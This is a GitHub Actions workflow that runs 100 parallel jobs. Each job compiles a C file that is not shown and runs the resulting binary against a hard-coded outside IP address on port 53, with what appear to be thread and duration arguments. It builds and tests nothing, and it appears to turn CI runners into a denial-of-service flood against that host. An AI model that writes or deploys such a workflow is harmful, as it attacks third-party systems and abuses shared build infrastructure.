name: Parallel GCC Jobs 100+

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  build-and-run:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        job-number: [1,2,3,4,5,6,7,8,9,10,
                     11,12,13,14,15,16,17,18,19,20,
                     21,22,23,24,25,26,27,28,29,30,
                     31,32,33,34,35,36,37,38,39,40,
                     41,42,43,44,45,46,47,48,49,50,
                     51,52,53,54,55,56,57,58,59,60,
                     61,62,63,64,65,66,67,68,69,70,
                     71,72,73,74,75,76,77,78,79,80,
                     81,82,83,84,85,86,87,88,89,90,
                     91,92,93,94,95,96,97,98,99,100]
    name: Job ${{ matrix.job-number }}
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Install GCC
        run: sudo apt-get update && sudo apt-get install -y build-essential

      - name: Compile C program
        run: gcc -o k m.c -lpthread

      - name: Run executable
        run: ./k 154.6.136.2 53 100 200
